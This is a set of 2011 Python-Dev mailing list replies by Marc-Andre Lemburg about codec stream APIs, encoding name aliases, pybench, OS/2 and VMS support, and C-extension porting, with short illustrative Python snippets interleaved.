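enc.reset()                # back to the initial "emit a BOM" state
enc.setstate(0)            # ...unless told the BOM was already written
third = enc.encode("c")
assert (len(first), len(second), len(third)) == (4, 2, 2)
```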

So instead of always suggesting to deprecate everything,
how about you come up with a proposal to add meaningful
new methods to those base classes ?

 Each codec can, however, implement variants which are optimized
 for the specific encoding or intercept certain stream methods
 to add functionality or improve the encoding/decoding
 performance.
 
 Can you give me some examples?

See the UTF-16 codec in the stdlib for example. This uses
some of the available possibilities to interpret the BOM mark
and then switches the encoder/decoder methods accordingly.

A lot more could be done for other variable length encoding
codecs, e.g. UTF-8, since these often have problems near
the end of a read due to missing bytes.
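For comparison, the incremental decoders already handle this case by buffering the incomplete tail between calls:

```python
import codecs

dec = codecs.getincrementaldecoder("utf-8")()
payload = "héllo".encode("utf-8")   # 'é' occupies two bytes
# Feed a chunk that ends in the middle of the 'é' sequence.
part1 = dec.decode(payload[:2])     # b'h\xc3' -> 'h'; \xc3 stays pending
part2 = dec.decode(payload[2:], final=True)
assert part1 == "h"
assert part1 + part2 == "héllo"
```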

The base class implementation provides a general purpose
implementation to cover the case, but it's not efficient,
since it doesn't know anything about the encoding
characteristics.

Such an implementation would have to be done per codec
and that's why we have per codec StreamReader/Writer
APIs.

 TextIOWrapper and StreamReaderWriter are merely wrappers
 around streams that make use of the codecs. They don't
 provide any codec logic themselves. That's the conceptual
 difference.
 ...
 StreamReader and StreamWriters ... work efficiently and
 directly on streams rather than buffers.
 
 StreamReader, StreamWriter, TextIOWrapper and StreamReaderWriter all
 have a file-like API: tell(), seek(), read(),  readline(), write(), etc.
 The implementation is maybe different, but the API is just the same, and
 so the usecases are just the same.
 
 I don't see in which case I should use StreamReader or StreamWriter
 instead TextIOWrapper. I thought that TextIOWrapper is specific to files
 on disk, but TextIOWrapper is already used for other usages like
 sockets.

I have no idea why TextIOWrapper was added to the stdlib
instead of making StreamReaderWriter more capable,
since StreamReaderWriter had already been available in Python
since Python 1.6 (and this is being used by codecs.open()).

Perhaps we should deprecate TextIOWrapper instead and
replace it with codecs.StreamReaderWriter ? ;-)

Seriously, I don't see use of TextIOWrapper as an argument
for removing StreamReader/Writer parts of the codecs API.

 Here's my reply from the ticket regarding using incremental
 encoders/decoders for the StreamReader/Writer parts of the
 codec set of APIs:

 
 The point about having them use incremental codecs for encoding and
 decoding is a good one and would need to be investigated. If possible,
 we could use incremental encoders/decoders for the standard
 StreamReader/Writer base classes or add new
 IncrementalStreamReader/Writer classes which then use the
 IncrementalEncoder/Decoder per default.
 
 Why do you want to write a duplicate feature? TextIOWrapper is already
 here, it's working and widely used.

See above and please also try to understand why we have per-codec
implementations for streams. I'm tired of repeating myself.

I would much prefer to see the codec-specific functionality
in TextIOWrapper added back to the codecs where it
belongs.

 I am working on codec issues (like CJK encodings, see #12100, #12057,
 #12016) and I would like to remove StreamReader and StreamWriter to have
 *less* code to maintain.

 If you want to add more code, will you be available to maintain it? It looks
 like you are busy, some people (not me ;-)) are still
 waiting for .transform()/.untransform()!

I dropped the ball on the idea after the strong wave of
comments against those methods. People will simply have
to use codecs.encode() and codecs.decode().
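For reference, these two functions work with any registered codec, including the bytes-to-bytes transforms, since they interface directly with the codec machinery without enforcing type restrictions:

```python
import codecs

# str-to-str transform:
assert codecs.encode("hello world", "rot-13") == "uryyb jbeyq"
assert codecs.decode("uryyb jbeyq", "rot-13") == "hello world"

# bytes-to-bytes transforms go through the same interface:
assert codecs.decode(codecs.encode(b"data", "base64"), "base64") == b"data"
```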

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, May 24 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   27 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com

Re: [Python-Dev] [Python-checkins] cpython (3.2): Avoid codec spelling issues by just using the utf-8 default.

2011-05-05 Thread M.-A. Lemburg
Raymond Hettinger wrote:
 
 On May 5, 2011, at 11:41 AM, Benjamin Peterson wrote:
 
 2011/5/5 raymond.hettinger python-check...@python.org:
 http://hg.python.org/cpython/rev/1a56775c6e54
 changeset:   69857:1a56775c6e54
 branch:  3.2
 parent:  69855:97a4855202b8
 user:Raymond Hettinger pyt...@rcn.com
 date:Thu May 05 11:35:50 2011 -0700
 summary:
  Avoid codec spelling issues by just using the utf-8 default.

 Out of curiosity, what is the issue?
 
 IIRC, the performance depended on how you spelled it.
 I believe that is why the spelling got changed in Py3.3.

Not really. It got changed because we have canonical names
for the codecs which the stdlib should use rather than
rely on aliases. Performance-wise it only makes a difference
if you use it in tight loops.

 Either way, the code is simpler by just using the default.

... as long as the casual reader knows what the default is :-)

I think it's better to make the choice explicit, if the code
relies on a particular non-ASCII encoding. If it doesn't,
then the default is fine.
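A small illustration of the point: the implicit spelling only works because the reader happens to know which default applies in each context.

```python
data = "naïve".encode("utf-8")

# bytes.decode() happens to default to UTF-8 in Python 3, but spelling
# the encoding out saves the casual reader from having to know that:
assert data.decode() == data.decode("utf-8") == "naïve"
```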

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, May 06 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   45 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/


Re: [Python-Dev] Convert Py_Buffer to Py_UNICODE

2011-05-02 Thread M.-A. Lemburg
Sijin Joseph wrote:
 Hi - I am working on a patch where I have an argument that can either be a
 unicode string or binary data. I parse the argument with the
 PyArg_ParseTuple method using the "s*" format specification and get a
 Py_buffer.
 
 I now need to convert this Py_buffer object to a PyUnicode and pass it into
 a function. What is the best way to do this? If I determine that the passed
 argument was binary using another flag parameter then I am passing
 Py_buffer->buf as a pointer to the start of the data.

I don't understand why you'd want to convert PyUnicode to PyBytes
(encoded as UTF-8), only to decode it again afterwards in order
to pass it to some other PyUnicode API.

It'd be more efficient to use the "O" parser marker and then
use PyObject_GetBuffer() to convert non-PyUnicode objects to
a Py_buffer.

 This is in the winsound module; here's the relevant code snippet:
 
 sound_playsound(PyObject *s, PyObject *args)
 {
     Py_buffer buffer;
     int flags;
     int ok;
     LPCWSTR pszSound;
 
     if (PyArg_ParseTuple(args, "s*i:PlaySound", &buffer, &flags)) {
         if (flags & SND_ASYNC && flags & SND_MEMORY) {
             /* Sidestep reference counting headache; unfortunately this also
                prevents SND_LOOP from memory. */
             PyBuffer_Release(&buffer);
             PyErr_SetString(PyExc_RuntimeError,
                             "Cannot play asynchronously from memory");
             return NULL;
         }
 
         if (flags & SND_MEMORY) {
             pszSound = buffer.buf;
         }
         else {
             /* pszSound = ; */
         }
 
 -- Sijin
 
 
 
 

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, May 02 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   49 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/


Re: [Python-Dev] Proposal for a common benchmark suite

2011-04-29 Thread M.-A. Lemburg
Mark Shannon wrote:
 Maciej Fijalkowski wrote:
 On Thu, Apr 28, 2011 at 11:10 PM, Stefan Behnel stefan...@behnel.de
 wrote:
 M.-A. Lemburg, 28.04.2011 22:23:
 Stefan Behnel wrote:
 DasIch, 28.04.2011 20:55:
 the CPython
 benchmarks have an extensive set of microbenchmarks in the pybench
 package
 Try not to care too much about pybench. There is some value in it, but
 some of its microbenchmarks are also tied to CPython's interpreter
 behaviour. For example, the benchmarks for literals can easily be
 considered dead code by other Python implementations so that they may
 end up optimising the benchmarked code away completely, or at least
 partially. That makes a comparison of the results somewhat pointless.
 The point of the micro benchmarks in pybench is to be able to compare
 them one-by-one, not by looking at the sum of the tests.

 If one implementation optimizes away some parts, then the comparison
 will show this fact very clearly - and that's the whole point.

 Taking the sum of the micro benchmarks only has some meaning
 as a very rough indicator of improvement. That's why I wrote pybench:
 to get a better, more detailed picture of what's happening,
 rather than trying to find some way of measuring average
 use.

 This average is very different depending on where you look:
 for some applications method calls may be very important,
 for others, arithmetic operations, and yet others may have more
 need for fast attribute lookup.
 I wasn't talking about averages or sums, and I also wasn't trying
 to put down pybench in general. As it stands, it makes sense as a
 benchmark for CPython.

 However, I'm arguing that a substantial part of it does not make
 sense as a benchmark for PyPy and others. With Cython, I couldn't
 get some of the literal arithmetic benchmarks to run at all. The
 runner script simply bails out with an error when the benchmarks
 accidentally run faster than the initial empty loop. I imagine that
 PyPy would eventually even drop the loop itself, thus leaving
 nothing to compare. Does that tell us that PyPy is faster than
 Cython for arithmetic? I don't think it does.

 When I see that a benchmark shows that one implementation runs in
 100% less time than another, I simply go *shrug* and look for a
 better benchmark to compare the two.

 I second here what Stefan says. This sort of benchmarks might be
 useful for CPython, but they're not particularly useful for PyPy or
 for comparisons (or any other implementation which tries harder to
 optimize stuff away). For example a method call in PyPy would be
 inlined and completely removed if method is empty, which does not
 measure method call overhead at all. That's why we settled on
 medium-to-large examples where it's more of an average of possible
 scenarios than just one.
 
 If CPython were to start incorporating any specialising optimisations,
 pybench wouldn't be much use for CPython.
 The Unladen Swallow folks didn't like pybench as a benchmark.

This is all true, but I think there's a general misunderstanding
of what pybench is.

I wrote pybench in 1997 when I was working on optimizing the
Python 1.5 implementation for use in an web application server.

At the time, we had pystone and that was a really poor benchmark
for determining of whether certain optimizations in the Python VM
and compiler made sense or not.

pybench was then improved and extended over the course of
several years and then added to Python 2.5 in 2006.

The benchmark is written as a framework for micro benchmarks
based on the assumption of a non-optimizing (byte code)
compiler.

As such it may or may not work with an optimizing compiler.
The calibration part would likely have to be disabled for
an optimizing compiler (run with -C 0) and a new set of
benchmark tests would have to be added; one which tests
the Python implementation at a higher level than the
existing tests.

That last part is something people tend to forget: pybench
is not a monolithic application with a predefined and
fixed set of tests. It's a framework that can be extended
as needed.

All you have to do is add a new module with test classes
and import it in Setup.py.
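As a sketch of what extending it looks like: the class below follows pybench's Test interface (version/operations/rounds attributes plus test() and calibrate() methods). Since pybench lives in the CPython source tree rather than the stdlib, a minimal stand-in base class is defined here to keep the example self-contained; the stand-in's run() method is an assumption, not pybench's real runner.

```python
import time

class Test:
    """Minimal stand-in for pybench's Test base class, which lives in
    Tools/pybench of the CPython source tree (assumed interface)."""
    version = 2.0
    operations = 1
    rounds = 10

    def run(self):
        t0 = time.perf_counter()
        for _ in range(self.rounds):
            self.test()
        return time.perf_counter() - t0

class DictLookup(Test):
    # A new micro benchmark: repeated dict lookups.
    operations = 5 * 100
    rounds = 1_000

    def test(self):
        d = {"a": 1, "b": 2, "c": 3}
        for _ in range(100):
            d["a"]; d["b"]; d["c"]; d["a"]; d["b"]

    def calibrate(self):
        # Same loop overhead without the lookups; pybench subtracts
        # this from the test() timing.
        d = {"a": 1, "b": 2, "c": 3}
        for _ in range(100):
            pass

elapsed = DictLookup().run()
assert elapsed >= 0.0
```

With the real pybench, the module containing DictLookup would then be imported in Setup.py so the runner picks it up.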

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 29 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   52 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/

Re: [Python-Dev] Proposal for a common benchmark suite

2011-04-29 Thread M.-A. Lemburg
DasIch wrote:
 Given those facts I think including pybench is a mistake. It does not
 allow for a fair or meaningful comparison between implementations
 which is one of the things the suite is supposed to be used for in the
 future.
 
 This easily leads to misinterpretation of the results from this
 particular benchmark and it negatively affects the performance data as
 a whole.
 
 The same applies to several Unladen Swallow microbenchmarks such as
 bm_call_method_*, bm_call_simple and bm_unpack_sequence.

I don't think we should exclude any implementation specific
benchmarks from a common suite.

They will not necessarily allow for comparisons between
implementations, but will provide important information
about the progress made in optimizing a particular
implementation.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 29 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   52 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/


Re: [Python-Dev] Proposal for a common benchmark suite

2011-04-28 Thread M.-A. Lemburg
Stefan Behnel wrote:
 DasIch, 28.04.2011 20:55:
 the CPython
 benchmarks have an extensive set of microbenchmarks in the pybench
 package
 
 Try not to care too much about pybench. There is some value in it, but
 some of its microbenchmarks are also tied to CPython's interpreter
 behaviour. For example, the benchmarks for literals can easily be
 considered dead code by other Python implementations so that they may
 end up optimising the benchmarked code away completely, or at least
 partially. That makes a comparison of the results somewhat pointless.

The point of the micro benchmarks in pybench is to be able to compare
them one-by-one, not by looking at the sum of the tests.

If one implementation optimizes away some parts, then the comparison
will show this fact very clearly - and that's the whole point.

Taking the sum of the micro benchmarks only has some meaning
as a very rough indicator of improvement. That's why I wrote pybench:
to get a better, more detailed picture of what's happening,
rather than trying to find some way of measuring average
use.

This average is very different depending on where you look:
for some applications method calls may be very important,
for others, arithmetic operations, and yet others may have more
need for fast attribute lookup.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 28 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   53 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/


Re: [Python-Dev] Drop OS/2 and VMS support?

2011-04-19 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 I asked one year ago if we should drop OS/2 support: Andrew MacIntyre,
 our OS/2 maintainer, answered:
 http://mail.python.org/pipermail/python-dev/2010-April/099477.html
 
 Extract:  The 3.x branch needs quite a bit of work on OS/2 to 
 deal with Unicode, as OS/2 was one of the earlier OSes with full 
 multiple language support and IBM developed a unique API.  I'm still 
 struggling to come to terms with this, partly because I myself don't 
 need it. 
 
 So one year later, Python 3 does still not support OS/2.
 
 --
 
 About VMS: I don't know if anyone is using Python (2 or 3) on VMS, or if
 Python 3 does work on VMS. I bet that it just does not compile :-)
 
 I don't know anyone using VMS or OS/2.
 
 --
 
 There are 39 #ifdef VMS and 52 #ifdef OS2. We can keep them and wait
 until someone works on these OSes to ensure that the test suite passes. But
 if nobody cares of these OSes and nobody wants to maintain them, it
 would be easier for the maintenance of the Python source code base to
 remove specific code.
 
 Well, not remove directly, but plan to remove it using the PEP 11
 procedure (mark OS/2 and VMS as unsupported, and remove the code in
 Python 3.4).

The Python core team is not really representative of the Python
community users, so I think this needs a different approach:

Instead of simply deprecating OSes without notice to the general
Python community, how about doing a call for support for these
OSes ?

If that doesn't turn up maintainers, then we can take the PEP 11
route.

FWIW: There's still a fan-base out there for OS/2 and its successor
eComStation:

http://en.wikipedia.org/wiki/EComStation
http://www.ecomstation.com/ecomstation20.phtml
http://www.warpstock.eu/

Same for VMS in form of OpenVMS:

http://en.wikipedia.org/wiki/OpenVMS
http://h71000.www7.hp.com/index.html?jumpid=/go/openvms
http://www.vmspython.org/

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 19 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/


Re: [Python-Dev] Drop OS/2 and VMS support?

2011-04-19 Thread M.-A. Lemburg
Doug Hellmann wrote:
 
 On Apr 19, 2011, at 10:36 AM, M.-A. Lemburg wrote:
 
 Victor Stinner wrote:
 Hi,

 I asked one year ago if we should drop OS/2 support: Andrew MacIntyre,
 our OS/2 maintainer, answered:
 http://mail.python.org/pipermail/python-dev/2010-April/099477.html

 Extract:  The 3.x branch needs quite a bit of work on OS/2 to 
 deal with Unicode, as OS/2 was one of the earlier OSes with full 
 multiple language support and IBM developed a unique API.  I'm still 
 struggling to come to terms with this, partly because I myself don't 
 need it. 

 So one year later, Python 3 does still not support OS/2.

 --

 About VMS: I don't know if anyone is using Python (2 or 3) on VMS, or if
 Python 3 does work on VMS. I bet that it just does not compile :-)

 I don't know anyone using VMS or OS/2.

 --

 There are 39 #ifdef VMS and 52 #ifdef OS2. We can keep them and wait
 until someone works on these OSes to ensure that the test suite passes. But
 if nobody cares of these OSes and nobody wants to maintain them, it
 would be easier for the maintenance of the Python source code base to
 remove specific code.

 Well, not remove directly, but plan to remove it using the PEP 11
 procedure (mark OS/2 and VMS as unsupported, and remove the code in
 Python 3.4).

 The Python core team is not really representative of the Python
 community users, so I think this needs a different approach:

 Instead of simply deprecating OSes without notice to the general
 Python community, how about doing a call for support for these
 OSes ?

 If that doesn't turn up maintainers, then we can take the PEP 11
 route.
 
 Victor, if you want to post the call for support to Python Insider, let me 
 know off list and I will set you up with access.

I can help with that if you like.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 19 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/


Re: [Python-Dev] Replace useless %.100s by %s in PyErr_Format()

2011-03-30 Thread M.-A. Lemburg
Victor Stinner wrote:
 Le jeudi 24 mars 2011 à 13:22 +0100, M.-A. Lemburg a écrit :
 BTW: Why do you think that %.100s is not supported in
 PyErr_Format() in Python 2.x ? PyString_FromFormatV()
 does support this. The change to use Unicode error strings
 introduced the problem, since PyUnicode_FromFormatV() for
 some reason ignores the precision (which it shouldn't).
 
 Oh... You are right, it is a regression in Python 3. We started to write
 unit tests for PyBytes_FromFormat() and PyUnicode_FromFormat(), I hope
 that they will improve the situation.
 
 That said, it's a good idea to add the #7330 fix
 to at least Python 2.7 as well, since ignoring the precision
 is definitely a bug. It may even be security relevant, since
 it could be used for DOS attacks on servers (e.g. causing them
 to write huge strings to log files instead of just a few
 hundred bytes per message), so it may even need to go into Python 2.6.
 
 Python 2 is not affected because PyErr_Format() uses
 PyString_FromFormatV() which supports precision for %s format (e.g.
 %.100s truncate the string to 100 bytes).

Right, but the PyUnicode_FromFormatV() which ignores
the precision is still present in Python 2.6 and 2.7,
even though it is not used by PyErr_Format().
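The effect of the precision field is easy to see at the Python level, where %-style formatting honours it; this is the behaviour the C-level PyUnicode_FromFormatV() should match:

```python
# A precision on %s caps how many characters are interpolated, which
# is what keeps a hostile, huge input from ballooning an error message.
huge = "x" * 1_000_000
assert len("%.100s" % huge) == 100
assert "%.100s" % "short" == "short"   # shorter input is unaffected
```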

 Do you think that Python 3.1-3.3 should be fixed?

Yes, indeed. The above mentioned security threat is real.

The CPython code only has a few cases where this could be used
for a DoS (e.g. in the pickle module or the AST code), but
since this function is used in 3rd party extensions,
those are affected indirectly as well.

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Mar 30 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/


Re: [Python-Dev] Copyright notices

2011-03-21 Thread M.-A. Lemburg
Nadeem Vawda wrote:
 I was wondering what the policy is regarding copyright notices and license
 boilerplate text at the top of source files.
 
 I am currently rewriting the bz2 module (see 
 http://bugs.python.org/issue5863),
 splitting the existing Modules/bz2module.c into Modules/_bz2module.c and
 Lib/bz2.py.
 
 Are new files expected to include a copyright notice and/or license 
 boilerplate
 text? 

Since you'll be adding new IP to Python, the new code you write should
contain your copyright and the standard PSF contributor agreement
notice, e.g.


(c) Copyright 2011 by Nadeem Vawda. Licensed to PSF under a Contributor 
Agreement.


(please also make sure you have sent the signed agreement to the PSF;
see http://www.python.org/psf/contrib/)

We don't have a general copyright or license boilerplate for Python
source files.

 Also, is it necessary for _bz2module.c (new) to retain the copyright
 notices from bz2module.c (old)? In the tracker issue, Antoine said he didn't
 think so, but suggested that I get some additional opinions.

If the file copies significant code parts from older files, the
copyright notices from those files will have to be added to the
file comment as well - ideally with a note explaining which parts
those copyrights apply to and where they originated.

If you are replacing the old implementation with a new one,
you don't need to copy over the old copyright statements.

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Improvements for Porting C Extension from 2 to 3

2011-03-03 Thread M.-A. Lemburg
Sümer Cip wrote:
 Hi,
 
 While porting a C extension from 2 to 3, I realized that there are some
 general cases which can be automated. For example, for my specific
 application (yappi - http://code.google.com/p/yappi/), all I need to do is
 following things:
 
 1) define PyModuleDef
 2) change PyString_AS_STRING calls  to _PyUnicode_AsString

Aside: Please don't use private APIs in Python extensions. In
particular, the above Unicode API is likely going to be phased out.

You're better off using PyUnicode_AsUTF8String() instead and
then leaving the PyString_AS_STRING() macro in place.
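
The type change this porting step involves can be sketched at the
Python level (the helper name below is made up for illustration; it is
not part of yappi or the C API):

```python
# Porting PyString_AS_STRING (2.x, returns char*) is not a 1:1 swap in
# 3.x: a str must first be encoded to a bytes object, which is what
# PyUnicode_AsUTF8String() does at the C level - it returns an owned
# bytes object whose buffer the extension can then read safely.
def as_utf8_buffer(text: str) -> bytes:
    # Python-level equivalent of PyUnicode_AsUTF8String()
    return text.encode("utf-8")

print(as_utf8_buffer("h\u00e9llo"))  # non-ASCII becomes a multi-byte sequence
```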

 3) change module init code a little.
 
 It occurred to me that all these kinds of standard changes can be automated via a
 script.
 
 Not sure on the usability of this however, because of my limited knowledge
 on the area.
 
 Would such a tool be worth implementing?

I'm not sure whether you can really automate this: The change from
8-bit strings to Unicode support usually requires reconsidering
whether you're dealing with plain text, encoded text data or
binary data.

However, a guide to what to replace and how to change the code
would probably help a lot. Please share your thoughts on the
python-porting mailing list and/or add to these wiki pages:

http://wiki.python.org/moin/PortingToPy3k
http://wiki.python.org/moin/PortingExtensionModulesToPy3k

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2

2011-02-24 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Wed, Feb 23, 2011 at 6:32 PM, M.-A. Lemburg m...@egenix.com wrote:
 Alexander Belopolsky wrote:
 ..
 In what sense is Latin-1 the official name?  The IANA charset
 registry has the following listing


 Name: ISO_8859-1:1987[RFC1345,KXS2]
 MIBenum: 4
 Source: ECMA registry
 Alias: iso-ir-100
 Alias: ISO_8859-1
 Alias: ISO-8859-1 (preferred MIME name)
 Alias: latin1
 ..
 Latin-1 is short for Latin Alphabet No. 1 and
 started out as ECMA-94 in 1985 and 1986:
 
 This does not explain your preference of Latin-1 over Latin1.

This is not my preference. See e.g. Wikipedia
http://en.wikipedia.org/wiki/ISO/IEC_8859-1

It is common practice to replace spaces in descriptive names with
a hyphen to come up with an identifier string (even Google
does or undoes this when searching the net).

Replacing spaces with an empty string is also an option, but
doesn't read as well.

 Both are perfectly valid abbreviations for Latin Alphabet No. 1.
 The spelling without - has the advantage of being a valid Python
 identifier and a module name.

The hyphens are converted to underscores by the lookup function
in the encodings package. That turns the name into a valid
Python module name.
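
This normalization can be observed through codecs.lookup(), which
applies the alias table and the hyphen-to-underscore rewrite before
importing the codec module (a sketch; the exact canonical name string
is a CPython implementation detail, so only equality is checked):

```python
import codecs

# All of these spellings resolve to the same codec after alias lookup
# and name normalization in the encodings package.
spellings = ["latin-1", "latin1", "iso-8859-1", "l1"]
infos = [codecs.lookup(name) for name in spellings]

# CodecInfo.name reports the canonical name the codec registered under.
assert len({info.name for info in infos}) == 1

# The same holds for utf-8 vs. utf8.
assert codecs.lookup("utf-8").name == codecs.lookup("utf8").name
print("all spellings map to:", infos[0].name)
```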

  The IANA registration for latin1 and
 lack of that for latin-1 most likely indicates that the former is
 more commonly found in machine readable metadata.

I don't know why you place so much emphasis on machine-readable metadata.
Python source code is machine readable, the Internet is machine
readable, all documents found there are machine readable.

As I said earlier on: the IANA registry is just that - a registry
of names with the purpose of avoiding name clashes in the resp.
name space. As such, it is not a standard, but merely a tool
to map various aliases to a canonical name.

The fact that an alias is registered doesn't allow any
conclusion about whether it's in widespread use or not, e.g.
csISOLatin1 gives me 6810 hits on Google.

I get 788,000 hits for 'latin1 -latin-1' on Google,
'latin-1' gives 2,600,000 hits. Looks like it's still
the preferred way to write that encoding name.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2

2011-02-23 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Wed, Feb 23, 2011 at 4:07 PM, Guido van Rossum gu...@python.org wrote:
 I'm guessing that one of these encoding names is recognized by the C
 code while the other one takes the slow path via the aliasing code.
 
 This is absolutely right.  In fact I am going to propose adding
 strcmp(lower, latin1) to the following test in
 PyUnicode_AsEncodedString():
 
 
   else if ((strcmp(lower, latin-1) == 0) ||
  (strcmp(lower, iso-8859-1) == 0))
 return PyUnicode_EncodeLatin1(...
 
 I'll open a separate issue for that.  In Python's own stdlib and tests
 latin1 is a more common spelling than latin-1, so it makes sense
 to optimize it.

Latin-1 is the official name and the one used internally by Python,
so it would be good to have the test suite and Python code in general
to use that variant of the name (just as utf-8 is preferred over
utf8).

Instead of adding more aliases to the C code, please change the
encoding names in the stdlib and test suite.

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2

2011-02-23 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Wed, Feb 23, 2011 at 4:23 PM, M.-A. Lemburg m...@egenix.com wrote:
 ..
 Latin-1 is the official name and the one used internally by Python,
 so it would be good to have the test suite and Python code in general
 to use that variant of the name (just as utf-8 is preferred over
 utf8).

 Instead of adding more aliases to the C code, please change the
 encoding names in the stdlib and test suite.
 
 I cannot agree with you on this one.  Official or not, latin-1 is
 much less commonly used than latin1.   Currently decode(latin1) is
 10x slower than  decode(latin-1) on short strings.  We already have
 a check for iso-8859-1 alias in PyUnicode_AsEncodedString().  Adding
 latin1 (and possibly utf8 as well) is likely to speed up many
 applications at minimal cost.

Fair enough, then add latin1 and utf8 to both PyUnicode_Decode()
and PyUnicode_AsEncodedString().

Still, the stdlib and test suite should be examples of using the
correct names.

I only found these few cases where the wrong Latin-1 name is used
in the stdlib:

./distutils/command/bdist_wininst.py:
-- # convert back to bytes. latin1 simply avoids any possible
-- encoding=latin1) as script:
-- script_data = script.read().encode(latin1)
./urllib/request.py:
-- data = base64.decodebytes(data.encode('ascii')).decode('latin1')
./asynchat.py:
-- encoding= 'latin1'
./ftplib.py:
-- encoding = latin1
./sre_parse.py:
-- encode = lambda x: x.encode('latin1')

I get 12 hits for the test suite.

Yet 108 for the correct name, so I can't follow your statement
that the wrong variant is used more often.

-- 
Marc-Andre Lemburg
eGenix.com



